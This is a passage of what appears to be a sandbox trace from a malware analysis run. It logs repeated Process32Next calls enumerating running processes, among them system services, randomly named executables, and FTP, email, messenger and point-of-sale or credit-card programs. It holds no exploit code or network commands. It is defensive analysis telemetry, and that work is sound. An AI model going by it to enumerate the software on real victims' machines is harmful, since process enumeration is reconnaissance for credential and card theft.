returned 1 [0236.371] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0236.372] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0236.373] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0236.375] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0236.376] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0236.377] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0236.379] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.380] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.381] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0236.383] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.384] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.386] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.387] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.388] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.390] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.391] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.392] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0236.394] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0236.395] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0236.396] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.398] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.399] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0236.400] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0236.424] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0236.425] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0236.426] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.428] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0236.429] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0236.431] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.432] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0236.433] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0236.435] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0236.436] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0236.437] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0236.439] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0236.440] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0236.442] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0236.443] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0236.444] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0236.446] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0236.447] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0236.457] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0236.459] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0236.461] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0236.462] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0236.495] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0236.497] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0236.498] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0236.500] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0236.501] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0236.502] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0236.504] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0236.505] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0236.506] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0236.508] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0236.509] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0236.511] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0236.513] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0236.514] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0236.516] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0236.518] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0236.519] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0236.521] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0236.523] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0236.524] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0236.526] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0236.528] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0236.529] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0236.531] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0236.532] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0236.534] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0236.535] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0236.537] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0236.538] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0236.540] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0236.586] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0236.588] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0236.589] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0236.591] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0236.592] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0236.594] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0236.595] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0236.597] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0236.598] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, 